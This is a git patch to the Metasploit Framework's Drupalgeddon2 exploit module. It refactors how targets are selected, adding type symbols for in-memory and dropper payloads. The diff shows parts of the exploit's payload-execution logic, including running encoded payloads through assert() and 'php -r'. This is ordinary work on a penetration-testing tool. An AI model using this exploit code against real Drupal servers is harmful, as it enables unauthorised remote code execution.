From b8eb7f2a86c3f80bb4efa747b0c752e355fa83bf Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 25 Apr 2018 11:53:26 -0500 Subject: [PATCH] Set target type instead of regexing names We're no longer matching multiple targets like /In-Memory/ or /Dropper/, so it makes sense to match on a specific value now. Old matching in this commit: 1900aa270813584ad6d45fcf985cc57fe86f7b16. --- .../unix/webapp/drupal_drupalgeddon2.rb | 44 ++++++++++++------- 1 file changed, 28 insertions(+), 16 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index fde174fe34..f7e2c09cc9 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -53,19 +53,23 @@ class MetasploitModule < Msf::Exploit::Remote # ['Automatic (PHP In-Memory)', 'Platform' => 'php', - 'Arch' => ARCH_PHP + 'Arch' => ARCH_PHP, + 'Type' => :php_memory ], ['Automatic (PHP Dropper)', 'Platform' => 'php', - 'Arch' => ARCH_PHP + 'Arch' => ARCH_PHP, + 'Type' => :php_dropper ], ['Automatic (Unix In-Memory)', 'Platform' => 'unix', - 'Arch' => ARCH_CMD + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory ], ['Automatic (Linux Dropper)', 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64] + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper ], # # Drupal 7.x targets (PHP, cmd/unix, native) @@ -73,22 +77,26 @@ class MetasploitModule < Msf::Exploit::Remote ['Drupal 7.x (PHP In-Memory)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('7.x') + 'Version' => Gem::Version.new('7.x'), + 'Type' => :php_memory ], ['Drupal 7.x (PHP Dropper)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('7.x') + 'Version' => Gem::Version.new('7.x'), + 'Type' => :php_dropper ], ['Drupal 7.x (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, - 'Version' => Gem::Version.new('7.x') + 'Version' => Gem::Version.new('7.x'), + 'Type' => :unix_memory ], ['Drupal 7.x (Linux Dropper)', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], - 'Version' => Gem::Version.new('7.x') + 'Version' => Gem::Version.new('7.x'), + 'Type' => :linux_dropper ], # # Drupal 8.x targets (PHP, cmd/unix, native) @@ -96,22 +104,26 @@ class MetasploitModule < Msf::Exploit::Remote ['Drupal 8.x (PHP In-Memory)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('8.x') + 'Version' => Gem::Version.new('8.x'), + 'Type' => :php_memory ], ['Drupal 8.x (PHP Dropper)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Version' => Gem::Version.new('8.x') + 'Version' => Gem::Version.new('8.x'), + 'Type' => :php_dropper ], ['Drupal 8.x (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, - 'Version' => Gem::Version.new('8.x') + 'Version' => Gem::Version.new('8.x'), + 'Type' => :unix_memory ], ['Drupal 8.x (Linux Dropper)', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], - 'Version' => Gem::Version.new('8.x') + 'Version' => Gem::Version.new('8.x'), + 'Type' => :linux_dropper ] ], 'DefaultTarget' => 0, # Automatic (PHP In-Memory) @@ -168,8 +180,8 @@ class MetasploitModule < Msf::Exploit::Remote end # NOTE: assert() is attempted first, then PHP_FUNC if that fails - case target.name - when /PHP In-Memory/ + case target['Type'] + when :php_memory execute_command(payload.encoded, func: 'assert') sleep(wfs_delay) @@ -177,9 +189,9 @@ class MetasploitModule < Msf::Exploit::Remote # XXX: This will spawn a *very* obvious process execute_command("php -r '#{payload.encoded}'") - when /Unix In-Memory/ + when :unix_memory execute_command(payload.encoded) - when /PHP Dropper/, /Linux Dropper/ + when :php_dropper, :linux_dropper dropper_assert sleep(wfs_delay)